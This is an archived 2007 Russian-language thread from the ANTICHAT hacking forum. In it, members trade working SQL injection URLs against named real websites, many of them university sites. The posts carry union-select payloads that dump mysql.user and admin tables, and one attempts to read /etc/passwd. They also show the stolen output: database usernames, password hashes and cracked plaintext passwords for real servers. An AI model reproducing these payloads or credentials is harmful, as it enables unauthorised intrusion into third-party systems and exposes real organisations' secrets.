ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.11.2007, 21:26
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Так, хорош раздавать мои edu'шки =(
Код:
http://www.fhmbuurmeisje.nl/profile.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
ttg-db@localhost:4.1.20-log:ttg-fhm
pr=3
edu
Код:
http://studyabroad.arizona.edu/display_program.php?id=76+group+by+2/*
Код:
http://events.internet2.edu/speakers/speakers.php?go=people&id=1+group+by+3/*
Последний раз редактировалось Fata1ex; 28.11.2007 в 21:44..
|
|
|
28.11.2007, 21:28
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
.edu
У всех версия mysql = 5
http://www.bethlehem.edu/news_events/bu_in_news/list.php?id=-67+union+select+1,concat(alpha,0x3a,name,0x3a,emai l,0x3a,pos,0x3a,dep,0x3a,type),3,4+from+staff/*
http://www.pharmchem.ku.edu/people-faculty-info.php?ID=-4+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*
|
|
|
|
28.11.2007, 22:19
|
|
Новичок
Регистрация: 12.12.2006
Сообщений: 22
Провел на форуме:
368623
Репутация:
18
|
|
PHP код:
http://iteco.ru/search.php?q=1'+union+select+1,user.usrname+from+mysql.user/*
|
|
|
|
28.11.2007, 23:56
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
experts.uchicago.edu
Код:
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+
4.0.24-standard
Код:
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1+--+
Код:
root:0bd914e54597ba5d
|
|
|
|
29.11.2007, 00:24
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
Duke News
http://dukemednews.duke. edu
Сама скуля:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0
Выводим столбцы:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/*
//будут в самом низу справа
Выводим имя_пользователя:версию_бд: имя_бд:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4/*
web@vml-news.duhs.duke.edu:4.0.18:news
File_priv выкл:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,load_file(0x2F6574632F706173737764),4/*
Есть доступ в mysql.user
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user,password),4+from+mysql.user/*
Специально для вас расшифровал 
Код:
mnogosearch:0547d8b07eba42f3:gh34mx92
root:623460e26f081bbc:mt01du01
web:761b2fc844890384:fr56nv29
Соседствующие сайты:
Код:
1) news.mc.duke.edu
2) dukemednews.duke.edu
3) dukemednews.com
4) dukemednews.org
админка:
Код:
http://dukemednews.duke.edu/admin
Пока все 
Последний раз редактировалось ENFIX; 29.11.2007 в 00:26..
|
|
|
|
29.11.2007, 01:13
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
dialog.kz
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14+from+u sers/*'
4.1.22-standard::dialog_hl@localhost::dialog_hl
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*'
коннект хреновый, подберите поля и юзайте =)
|
|
|
|
29.11.2007, 01:32
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от halkfild
dialog.kz
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*
коннект хреновый, подберите поля и юзайте =)
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(char(58),userna me,userpass),6,7,8,9,10,11,12,13,14+from+users/*
admin:edf95addf04ca869faa73677ae66f5ea
http://www.needaplacetogo.co.uk/fashion.asp?id=1+or+1=(SELECT+TOP+1+cast(M_USERNAM E+as+nvarchar)%2B%27%3A%27%2Bcast(M_PASSWORD+as+nv archar)+from+FORUM_MEMBERS+WHERE+MEMBER_ID=1)--
Последний раз редактировалось Ded MustD!e; 29.11.2007 в 01:46..
|
|
|
|
29.11.2007, 09:39
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Италия
Powered By Centro Studi Airone
Уязвимость в скрипте leggi.php
Примеры:
Код:
http://www.deltard.com/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database( ),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&
4.1.22-standard-log:Sql84077_1:Sql84077@62.149.140.88
Код:
http://www.onecapital.it/homepage/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql20147_3:Sql20147@62.149.140.29
Код:
http://www.anguillarainforma.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql24700_1:Sql24700@62.149.140.36
Код:
http://www.101vetrine.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),databas e(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql72154_1:Sql72154@62.149.140.28
|
|
|
|
29.11.2007, 11:44
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789
Репутация:
71
|
|
http://www.vedo.ru
Код:
http://www.vedo.ru/guest/guest.php?id=-1+union+select+1,2,username,user_password,5,6,7,8+from+phpbb_users/*
admin:061ed190e137ee416c25b4e8658fd3a3
http://www.redbullreaccion.com/
Код:
http://www.redbullreaccion.com/news_detail.php?lang=en&id=-1+union+select+1,2,3,user(),version(),6,database(),8,9,10/*
|
|
|
|
29.11.2007, 13:20
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
akce.cvut.cz
https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,1,1,1,1,1,1,1,1,1/*
4.1.11-Debian_4sarge7-log/akce/akce@localhost
https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(userna me+as+binary),cast(password+as+binary)),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1+f rom+users/*
логин/хеш
admin/*474ECE06942A2A91CBB3CB29D6C6F6A97C449630 прикольный хеш ))
---------------------------------------------------------------------
http://www.balka.kharkov.ua/select_ss.php?tp=1&ss=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*
4.0.27/portal/adminkh@localhost
--------------------------------------------------------------------
http://www.megaspravka.ru/news_show.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7/*
4.1.22/wwwmegaspravkaru/megaspra@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
